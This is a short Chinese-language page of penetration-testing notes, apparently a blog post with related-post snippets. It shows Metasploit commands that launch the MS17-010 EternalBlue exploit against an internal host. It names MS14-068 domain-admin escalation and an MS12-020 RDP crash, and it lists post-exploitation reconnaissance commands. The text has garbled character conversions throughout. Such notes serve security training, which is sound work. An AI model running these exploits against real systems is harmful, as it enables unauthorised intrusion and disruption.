滲透,最重要的是許可權。
滲透是乙個許可權從無到有,從小到大,從少到多的過程。
從外到內:
1.外網暴漏3389埠,通過windwos的漏洞從外網滲入到內網中。
用到的ms17_010
(ms17_010內網滲透)
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 10.10.1.13
msf exploit(ms17_010_eternalblue) > run
從小到大:
1.內網,域賬號提權。
① 用 ms14_068,通過本地的域控賬戶,利用kdc的漏洞獲取到域管理員的許可權。
② 用 ms12_020,通過drp漏洞可以使對方藍屏(xp,win7,2003,2008) kb2621440
滲透測試 許可權提公升實驗
已經獲得了普通使用者許可權 普通使用者new 使用background命令暫時退出session2,使用post multi recon local exploit suggester來利用已獲得的普通賬號,得到目標靶機中的更多漏洞資訊 由前面結果得到一些可能存在的漏洞,選擇乙個漏洞進行利用 配置引...
滲透測試學習筆記 初識滲透測試
黑客活動 hacking 道德黑客 ethical hacking 白帽黑客 white hat hacking poc proof of concept,概念證明。pt penetration testing或者pen testing,滲透測試。apt advanced package tool,...
滲透測試 提權後獲取資訊
uname a 檢視當前系統版本 核心等 whoami 檢視當前使用的使用者 pwd 檢視當前所在路徑 ifconfig a 檢視網絡卡資訊,ip mac等 iptables l 檢視防火牆規則 dpkg l 檢視已經安裝的軟體 ps aux 檢視程序 netstat nr 檢視閘道器 netsta...